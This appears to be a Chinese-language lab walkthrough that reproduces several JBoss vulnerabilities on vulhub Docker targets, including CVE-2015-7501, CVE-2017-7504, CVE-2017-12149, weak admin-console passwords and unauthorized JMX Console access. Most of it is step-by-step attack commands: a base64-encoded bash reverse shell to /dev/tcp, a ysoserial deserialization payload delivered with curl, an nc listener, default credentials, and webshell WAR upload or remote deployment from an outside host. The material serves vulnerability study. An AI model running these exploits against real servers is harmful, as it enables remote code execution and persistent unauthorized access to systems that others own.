CVE-2015-7501

步骤一：环境搭建

cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

docker ps

步骤二：POC，访问地址

http://192.168.10.190:8080/invoker/JMXInvokerServlet

返回如下，说明接⼝开放，此接⼝存在反序列化漏洞

步骤三：下载 ysoserial ⼯具进⾏漏洞利⽤

GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

将反弹shell进⾏base64编码
bash -i >& /dev/tcp/192.168.10.190/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjE5MC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}">exp.ser

步骤四：服务器设置监听得端⼝

nc -lvvp 6666

步骤五：执⾏命令

curl 192.168.10.190:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

反弹成功

CVE-2017-7504

步骤一：

cd vulhub/jboss/CVE-2017-7504

docker-compose up -d

步骤二：访问漏洞地址

http://192.168.10.190:8080/jbossmq-httpil/HTTPServerILServlet

步骤三：获取shell

python3 jexboss.py -u http://192.168.10.190:8080

CVE-2017-12149

步骤一：环境搭建

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

步骤二：漏洞复现

步骤三：验证是否存在漏洞 , 访问

http://192.168.10.190:8080/invoker/readonly

该漏洞出现在/invoker/readonly中 ，服务器将⽤户post请求内容进⾏反序列化

步骤四：使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可：

Administration Console弱⼝令

步骤一：环境部署

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码：admin:vulhub

步骤二：登录

http://192.168.10.190:8080/admin-console/login.seam

步骤三：点击web应⽤，上传后⻔ shell.war

上传

步骤四：连接WebShell

http://192.168.10.190:8080/shell/shell.jsp

⾼版本JMX Console未授权

步骤一：环境搭建

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

步骤二：

http://192.168.10.190:8080/jmx-console/

admin vulhub

步骤二：本地搭建部署点

在JMX Console⻚⾯点击jboss.system链接，在Jboss.system⻚⾯中点击service=MainDeployer

步骤三：进⼊service=MainDeployer⻚⾯之后，找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

步骤四：输⼊Invoke

http://114.55.130.115/shell.war

步骤五：连接Webshell

http://192.168.10.190:8080/shell/shell.jsp

低版本JMX Console未授权

步骤一：部署环境

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

步骤二：进行登录

admin admin

步骤三：然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去（通过URL的⽅式远程部署）

步骤四：找到⻚⾯中的void addURL() 选项远程加载war包来部署。

http://114.55.130.115/shell.war

步骤五：webshell连接

http://192.168.10.190:8080/shell/shell.jsp